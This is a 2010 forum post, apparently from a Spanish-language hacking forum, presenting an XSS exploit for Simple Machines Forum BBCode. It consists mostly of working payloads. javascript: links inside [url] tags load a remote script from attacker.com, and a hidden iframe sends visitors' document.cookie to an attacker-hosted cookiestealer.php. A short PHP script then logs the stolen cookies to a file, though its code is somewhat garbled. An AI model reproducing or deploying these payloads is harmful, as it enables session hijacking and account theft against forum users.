3. XSS BBCode Exploit SMF All Versions
This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.
Pages: [1]   Go Down
« previous next »

XSS BBCode Exploit SMF All Versions

  • 0 Replies
  • 3542 Views

0 Members and 1 Guest are viewing this topic.

Offline dracko.rx

  • *
  • Underc0der
  • Posts: 238
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • http://rax0rnet.blogspot.com/
    • Email

XSS BBCode Exploit SMF All Versions

  • on: February 25, 2010, 11:19:12 am
Author: Xianur0

BBCode of the smf not filtered properly specified urls:

Code: You are not allowed to view links. Register or Login
[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]
Click on the image, run the javascript..

BBC Cookie Exploit:

Code: You are not allowed to view links. Register or Login
[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3Ciframe+width%3D%220%25%22+height%3D%220%25%22+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fcookiestealer.php%3Fcookie%3D%27+%2Bdocument.cookie+%2B%27+frameborder%3D%220%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]
PHP Cookie Stealer:

Code: You are not allowed to view links. Register or Login
<?php
$cookie $_GET['cookie'];
$handler fopen('cookies.txt''a');
fwrite($handler$cookie."\n");
?>
Logged
Venta de diseños - Contactar por MP

You are not allowed to view links. Register or Login
Pages: [1]   Go Up
« previous next »